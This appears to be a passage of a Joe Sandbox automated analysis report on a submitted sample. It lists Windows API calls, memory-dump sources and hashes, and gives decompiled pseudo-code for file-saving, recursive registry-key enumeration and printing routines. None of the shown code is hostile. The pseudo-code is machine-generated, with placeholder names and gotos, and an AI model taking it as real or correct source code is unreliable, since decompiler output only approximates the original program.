                                                                                                                                                                                                                                                                                          0x000f7404
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f7404
                                                                                                                                                                                                                                                                                          0x000f73d5
                                                                                                                                                                                                                                                                                          0x000f7410
                                                                                                                                                                                                                                                                                          0x000f7418
                                                                                                                                                                                                                                                                                          0x000f741b
                                                                                                                                                                                                                                                                                          0x000f741b
                                                                                                                                                                                                                                                                                          0x000f7431

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FACF0: _memset.LIBCMT ref: 000FAD0A
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FACF0: lstrlenA.KERNEL32(?,All Files (*.*),00000000), ref: 000FAD81
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FACF0: lstrcpynA.KERNEL32(?,?,00000104), ref: 000FAD97
                                                                                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 000F73AF
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FADC0: GetCurrentThreadId.KERNEL32 ref: 000FADD3
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FADC0: EnterCriticalSection.KERNEL32(00170C68,?,000F73BA), ref: 000FADE1
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FADC0: LeaveCriticalSection.KERNEL32(00170C68,?,000F73BA), ref: 000FADFB
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FADC0: GetOpenFileNameA.COMDLG32(?,?,000F73BA), ref: 000FAE0B
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F7250: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,08000020,00000000), ref: 000F726A
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 000F73EB
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 000F73F5
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B9,00000000,00000000), ref: 000F7404
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 000F7442
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalFileMessageSectionlstrcpy$ActiveCreateCurrentEnterLeaveNameOpenSendThreadWindow_memsetlstrcpynlstrlen
                                                                                                                                                                                                                                                                                          • String ID: All Files (*.*)$Error writing file!
                                                                                                                                                                                                                                                                                          • API String ID: 155815269-2631184309
                                                                                                                                                                                                                                                                                          • Opcode ID: a2c9f57403bc19c1e56689d3d137ed51b02a2451ef10d6bf21942e4e01dfcb83
                                                                                                                                                                                                                                                                                          • Instruction ID: cfc15ac42354dc9d79e0e41e7cb866030b63e0b9bb94cf856c5d9f636aa06d63
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2c9f57403bc19c1e56689d3d137ed51b02a2451ef10d6bf21942e4e01dfcb83
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0216675A4121CABD7649B64CD89BE9B7B8FB04704F504194FA0CA7680DB70AD809FA1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 025514DB
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 02551507
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719923860.0000000002551000.00000020.00001000.00020000.00000000.sdmp, Offset: 02551000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2551000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 64221f4d0130923bff0beaa3173d2934334e94c4ddc45426167d848294d008a3
                                                                                                                                                                                                                                                                                          • Instruction ID: 9b29a9376bcaa313100ff83b8ea228861d0f0492cd7b6da14b13765b1cbf7b7b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64221f4d0130923bff0beaa3173d2934334e94c4ddc45426167d848294d008a3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5871C574E00619EFDB04DF94C590BADBBB2FF48304F648599D81AAB341D734AA41CF98
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E000F1920(void** __ecx, char* _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				char _v272;
                                                                                                                                                                                                                                                                                          				void* _v276;
                                                                                                                                                                                                                                                                                          				int _v280;
                                                                                                                                                                                                                                                                                          				int _v284;
                                                                                                                                                                                                                                                                                          				int _v288;
                                                                                                                                                                                                                                                                                          				int _v292;
                                                                                                                                                                                                                                                                                          				char* _v296;
                                                                                                                                                                                                                                                                                          				struct _FILETIME _v304;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                                                                                                          				long _t40;
                                                                                                                                                                                                                                                                                          				long _t44;
                                                                                                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                                                                                          				char* _t77;
                                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                                          				signed int _t82;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t36 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v12 = _t36 ^ _t82;
                                                                                                                                                                                                                                                                                          				_t77 = _a4;
                                                                                                                                                                                                                                                                                          				_t80 = __ecx;
                                                                                                                                                                                                                                                                                          				_v296 = _t77;
                                                                                                                                                                                                                                                                                          				_v288 = 0;
                                                                                                                                                                                                                                                                                          				_v284 = 0;
                                                                                                                                                                                                                                                                                          				_v280 = 0;
                                                                                                                                                                                                                                                                                          				_v276 = 0;
                                                                                                                                                                                                                                                                                          				_t40 = RegOpenKeyExA( *__ecx, _t77, 0, __ecx[1] | 0x0002001f,  &_v276);
                                                                                                                                                                                                                                                                                          				_t66 = _v288;
                                                                                                                                                                                                                                                                                          				_t62 = _t40;
                                                                                                                                                                                                                                                                                          				if(_t40 != 0) {
                                                                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                                                                          					if(_t66 != 0) {
                                                                                                                                                                                                                                                                                          						RegCloseKey(_t66);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return E001059E6(_t62, _t62, _v12 ^ _t82, _t77, _t80, 0);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t44 = 0;
                                                                                                                                                                                                                                                                                          					if(_t66 != 0) {
                                                                                                                                                                                                                                                                                          						_t44 = RegCloseKey(_t66);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t66 = _v276;
                                                                                                                                                                                                                                                                                          					_v284 = 0;
                                                                                                                                                                                                                                                                                          					_t62 = _t44;
                                                                                                                                                                                                                                                                                          					_v288 = _t66;
                                                                                                                                                                                                                                                                                          					if(_t44 == 0) {
                                                                                                                                                                                                                                                                                          						_t63 = RegEnumKeyExA;
                                                                                                                                                                                                                                                                                          						_t78 =  &_v292;
                                                                                                                                                                                                                                                                                          						_v292 = 0x100;
                                                                                                                                                                                                                                                                                          						if(RegEnumKeyExA(_t66, 0,  &_v272,  &_v292, 0, 0, 0,  &_v304) != 0) {
                                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                                          							_t48 = _v288;
                                                                                                                                                                                                                                                                                          							if(_t48 != 0) {
                                                                                                                                                                                                                                                                                          								RegCloseKey(_t48);
                                                                                                                                                                                                                                                                                          								_v288 = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t63 = _v296;
                                                                                                                                                                                                                                                                                          							_v284 = 0;
                                                                                                                                                                                                                                                                                          							_t80 = E000F1740(_t80, _v296);
                                                                                                                                                                                                                                                                                          							_t51 = _v288;
                                                                                                                                                                                                                                                                                          							if(_t51 != 0) {
                                                                                                                                                                                                                                                                                          								RegCloseKey(_t51);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t52 = _t80;
                                                                                                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                                          								_t52 = E000F1920( &_v288,  &_v272);
                                                                                                                                                                                                                                                                                          								_v276 = _t52;
                                                                                                                                                                                                                                                                                          								if(_t52 != 0) {
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t78 = _v288;
                                                                                                                                                                                                                                                                                          								_v292 = 0x100;
                                                                                                                                                                                                                                                                                          								if(RegEnumKeyExA(_v288, 0,  &_v272,  &_v292, 0, 0, 0,  &_v304) == 0) {
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t73 = _v288;
                                                                                                                                                                                                                                                                                          							if(_t73 == 0) {
                                                                                                                                                                                                                                                                                          								L16:
                                                                                                                                                                                                                                                                                          								return E001059E6(_t52, _t63, _v12 ^ _t82, _t78, _t80, 0);
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								RegCloseKey(_t73);
                                                                                                                                                                                                                                                                                          								return E001059E6(_v276, _t63, _v12 ^ _t82, _t78, _t80, 0);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L19:
                                                                                                                                                                                                                                                                                          			}


























                                                                                                                                                                                                                                                                                          0x000f1929
                                                                                                                                                                                                                                                                                          0x000f1930
                                                                                                                                                                                                                                                                                          0x000f1933
                                                                                                                                                                                                                                                                                          0x000f1939
                                                                                                                                                                                                                                                                                          0x000f1952
                                                                                                                                                                                                                                                                                          0x000f1958
                                                                                                                                                                                                                                                                                          0x000f195e
                                                                                                                                                                                                                                                                                          0x000f1964
                                                                                                                                                                                                                                                                                          0x000f196a
                                                                                                                                                                                                                                                                                          0x000f1970
                                                                                                                                                                                                                                                                                          0x000f1976
                                                                                                                                                                                                                                                                                          0x000f197c
                                                                                                                                                                                                                                                                                          0x000f1980
                                                                                                                                                                                                                                                                                          0x000f19a7
                                                                                                                                                                                                                                                                                          0x000f19a9
                                                                                                                                                                                                                                                                                          0x000f19ac
                                                                                                                                                                                                                                                                                          0x000f19ac
                                                                                                                                                                                                                                                                                          0x000f19c4
                                                                                                                                                                                                                                                                                          0x000f1982
                                                                                                                                                                                                                                                                                          0x000f1982
                                                                                                                                                                                                                                                                                          0x000f1986
                                                                                                                                                                                                                                                                                          0x000f1989
                                                                                                                                                                                                                                                                                          0x000f1989
                                                                                                                                                                                                                                                                                          0x000f198f
                                                                                                                                                                                                                                                                                          0x000f1995
                                                                                                                                                                                                                                                                                          0x000f199b
                                                                                                                                                                                                                                                                                          0x000f199d
                                                                                                                                                                                                                                                                                          0x000f19a5
                                                                                                                                                                                                                                                                                          0x000f19c7
                                                                                                                                                                                                                                                                                          0x000f19d7
                                                                                                                                                                                                                                                                                          0x000f19e7
                                                                                                                                                                                                                                                                                          0x000f19f5
                                                                                                                                                                                                                                                                                          0x000f1a50
                                                                                                                                                                                                                                                                                          0x000f1a50
                                                                                                                                                                                                                                                                                          0x000f1a58
                                                                                                                                                                                                                                                                                          0x000f1a5b
                                                                                                                                                                                                                                                                                          0x000f1a61
                                                                                                                                                                                                                                                                                          0x000f1a61
                                                                                                                                                                                                                                                                                          0x000f1a67
                                                                                                                                                                                                                                                                                          0x000f1a6f
                                                                                                                                                                                                                                                                                          0x000f1a7a
                                                                                                                                                                                                                                                                                          0x000f1a7c
                                                                                                                                                                                                                                                                                          0x000f1a84
                                                                                                                                                                                                                                                                                          0x000f1a87
                                                                                                                                                                                                                                                                                          0x000f1a87
                                                                                                                                                                                                                                                                                          0x000f1a8d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f19f7
                                                                                                                                                                                                                                                                                          0x000f1a00
                                                                                                                                                                                                                                                                                          0x000f1a0d
                                                                                                                                                                                                                                                                                          0x000f1a12
                                                                                                                                                                                                                                                                                          0x000f1a1a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f1a27
                                                                                                                                                                                                                                                                                          0x000f1a40
                                                                                                                                                                                                                                                                                          0x000f1a4e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f1a4e
                                                                                                                                                                                                                                                                                          0x000f1aa2
                                                                                                                                                                                                                                                                                          0x000f1aaa
                                                                                                                                                                                                                                                                                          0x000f1a92
                                                                                                                                                                                                                                                                                          0x000f1a9f
                                                                                                                                                                                                                                                                                          0x000f1aac
                                                                                                                                                                                                                                                                                          0x000f1aad
                                                                                                                                                                                                                                                                                          0x000f1ac9
                                                                                                                                                                                                                                                                                          0x000f1ac9
                                                                                                                                                                                                                                                                                          0x000f1aaa
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f19a5
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 000F1970
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?), ref: 000F1989
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?), ref: 000F19AC
                                                                                                                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,00000000,?,?), ref: 000F19F1
                                                                                                                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,?,?,?,00000000,?,?), ref: 000F1A4A
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?), ref: 000F1A5B
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?), ref: 000F1A87
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Close$Enum$Open
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4245071059-0
                                                                                                                                                                                                                                                                                          • Opcode ID: dc4e47a4e543051c4dab7d1ccfc5427fbc59b3258f5164ca7d4f1af205981137
                                                                                                                                                                                                                                                                                          • Instruction ID: 47a39414b2b702bf507a290623ce7c2439d5f26235515d56a710c06b52ada317
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc4e47a4e543051c4dab7d1ccfc5427fbc59b3258f5164ca7d4f1af205981137
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E414DB1A0112CDBCB29DB55DC85AEEB7B8EF4D750F00819AE609D3640D6709E85DFE0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                                                                                                                                          			E000F6580(void* __esi) {
                                                                                                                                                                                                                                                                                          				struct HDC__* _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v20;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v24;
                                                                                                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                                                                                                          				int _t41;
                                                                                                                                                                                                                                                                                          				DEVMODEA* _t52;
                                                                                                                                                                                                                                                                                          				DEVMODEA* _t54;
                                                                                                                                                                                                                                                                                          				DEVMODEA* _t59;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t66;
                                                                                                                                                                                                                                                                                          				intOrPtr _t92;
                                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                                          				signed int _t95;
                                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t94 = __esi;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F0B8);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t35 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_push(_t35 ^ _t95);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_t66 = E000FC830(_t98, __esi,  *((intOrPtr*)(__esi + 8)));
                                                                                                                                                                                                                                                                                          				_v24 = _t66;
                                                                                                                                                                                                                                                                                          				if(_t66 == 0) {
                                                                                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t41 = StartDocA(_t66, __esi + 0xc);
                                                                                                                                                                                                                                                                                          					 *(__esi + 0x20) = _t41;
                                                                                                                                                                                                                                                                                          					_push(_t66);
                                                                                                                                                                                                                                                                                          					if(_t41 > 0) {
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__esi + 4))))))))();
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						_t92 =  *((intOrPtr*)(__esi + 0x28));
                                                                                                                                                                                                                                                                                          						__eflags = _t92 -  *((intOrPtr*)(__esi + 0x2c));
                                                                                                                                                                                                                                                                                          						if(_t92 <=  *((intOrPtr*)(__esi + 0x2c))) {
                                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                                          								_t52 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 4)))) + 0x18))))(_t92);
                                                                                                                                                                                                                                                                                          								__eflags = _t52;
                                                                                                                                                                                                                                                                                          								if(_t52 == 0) {
                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t54 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 4)))) + 0x14))))(_v20, _t92);
                                                                                                                                                                                                                                                                                          								__eflags = _t54;
                                                                                                                                                                                                                                                                                          								if(_t54 != 0) {
                                                                                                                                                                                                                                                                                          									ResetDCA(_t66, _t54);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								StartPage(_t66);
                                                                                                                                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 4)))) + 8))))(_t92, _t66);
                                                                                                                                                                                                                                                                                          								_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 4)))) + 0xc))))(_t92, _t66);
                                                                                                                                                                                                                                                                                          								__eflags = _t59;
                                                                                                                                                                                                                                                                                          								if(_t59 == 0) {
                                                                                                                                                                                                                                                                                          									 *(_t94 + 0x24) = 1;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 4)))) + 0x10))))(_t92, _t66);
                                                                                                                                                                                                                                                                                          								EndPage(_t66);
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t94 + 0x24);
                                                                                                                                                                                                                                                                                          								if( *(_t94 + 0x24) == 0) {
                                                                                                                                                                                                                                                                                          									_v20 = _t92;
                                                                                                                                                                                                                                                                                          									_t92 = _t92 + 1;
                                                                                                                                                                                                                                                                                          									__eflags = _t92 -  *((intOrPtr*)(_t94 + 0x2c));
                                                                                                                                                                                                                                                                                          									if(_t92 <=  *((intOrPtr*)(_t94 + 0x2c))) {
                                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L12;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 4)))) + 4))))(_t66,  *(_t94 + 0x24) & 0x000000ff);
                                                                                                                                                                                                                                                                                          						__eflags =  *(_t94 + 0x24);
                                                                                                                                                                                                                                                                                          						_push(_t66);
                                                                                                                                                                                                                                                                                          						if( *(_t94 + 0x24) == 0) {
                                                                                                                                                                                                                                                                                          							EndDoc();
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							AbortDoc();
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t94 + 0x20)) = 0;
                                                                                                                                                                                                                                                                                          						DeleteDC(_t66);
                                                                                                                                                                                                                                                                                          						 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						DeleteDC();
                                                                                                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x000f6580
                                                                                                                                                                                                                                                                                          0x000f6583
                                                                                                                                                                                                                                                                                          0x000f6585
                                                                                                                                                                                                                                                                                          0x000f6590
                                                                                                                                                                                                                                                                                          0x000f6596
                                                                                                                                                                                                                                                                                          0x000f659d
                                                                                                                                                                                                                                                                                          0x000f65a1
                                                                                                                                                                                                                                                                                          0x000f65a9
                                                                                                                                                                                                                                                                                          0x000f65ac
                                                                                                                                                                                                                                                                                          0x000f65b9
                                                                                                                                                                                                                                                                                          0x000f65bb
                                                                                                                                                                                                                                                                                          0x000f65c0
                                                                                                                                                                                                                                                                                          0x000f65db
                                                                                                                                                                                                                                                                                          0x000f65e0
                                                                                                                                                                                                                                                                                          0x000f65ed
                                                                                                                                                                                                                                                                                          0x000f65c2
                                                                                                                                                                                                                                                                                          0x000f65c7
                                                                                                                                                                                                                                                                                          0x000f65cd
                                                                                                                                                                                                                                                                                          0x000f65d0
                                                                                                                                                                                                                                                                                          0x000f65d3
                                                                                                                                                                                                                                                                                          0x000f65f5
                                                                                                                                                                                                                                                                                          0x000f65f7
                                                                                                                                                                                                                                                                                          0x000f65fa
                                                                                                                                                                                                                                                                                          0x000f65fd
                                                                                                                                                                                                                                                                                          0x000f6600
                                                                                                                                                                                                                                                                                          0x000f6602
                                                                                                                                                                                                                                                                                          0x000f660b
                                                                                                                                                                                                                                                                                          0x000f660d
                                                                                                                                                                                                                                                                                          0x000f660f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f661e
                                                                                                                                                                                                                                                                                          0x000f6620
                                                                                                                                                                                                                                                                                          0x000f6622
                                                                                                                                                                                                                                                                                          0x000f6626
                                                                                                                                                                                                                                                                                          0x000f6626
                                                                                                                                                                                                                                                                                          0x000f662d
                                                                                                                                                                                                                                                                                          0x000f663d
                                                                                                                                                                                                                                                                                          0x000f6649
                                                                                                                                                                                                                                                                                          0x000f664b
                                                                                                                                                                                                                                                                                          0x000f664d
                                                                                                                                                                                                                                                                                          0x000f664f
                                                                                                                                                                                                                                                                                          0x000f664f
                                                                                                                                                                                                                                                                                          0x000f665d
                                                                                                                                                                                                                                                                                          0x000f6660
                                                                                                                                                                                                                                                                                          0x000f6666
                                                                                                                                                                                                                                                                                          0x000f666a
                                                                                                                                                                                                                                                                                          0x000f666c
                                                                                                                                                                                                                                                                                          0x000f666f
                                                                                                                                                                                                                                                                                          0x000f6670
                                                                                                                                                                                                                                                                                          0x000f6673
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f6673
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f666a
                                                                                                                                                                                                                                                                                          0x000f6602
                                                                                                                                                                                                                                                                                          0x000f6675
                                                                                                                                                                                                                                                                                          0x000f6683
                                                                                                                                                                                                                                                                                          0x000f6685
                                                                                                                                                                                                                                                                                          0x000f6689
                                                                                                                                                                                                                                                                                          0x000f668a
                                                                                                                                                                                                                                                                                          0x000f6694
                                                                                                                                                                                                                                                                                          0x000f668c
                                                                                                                                                                                                                                                                                          0x000f668c
                                                                                                                                                                                                                                                                                          0x000f668c
                                                                                                                                                                                                                                                                                          0x000f669b
                                                                                                                                                                                                                                                                                          0x000f66a2
                                                                                                                                                                                                                                                                                          0x000f66ad
                                                                                                                                                                                                                                                                                          0x000f66ba
                                                                                                                                                                                                                                                                                          0x000f65d5
                                                                                                                                                                                                                                                                                          0x000f65d5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f65d5
                                                                                                                                                                                                                                                                                          0x000f65d3

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FC830: CreateDCA.GDI32(00000000,?,00000000,?), ref: 000FC8C1
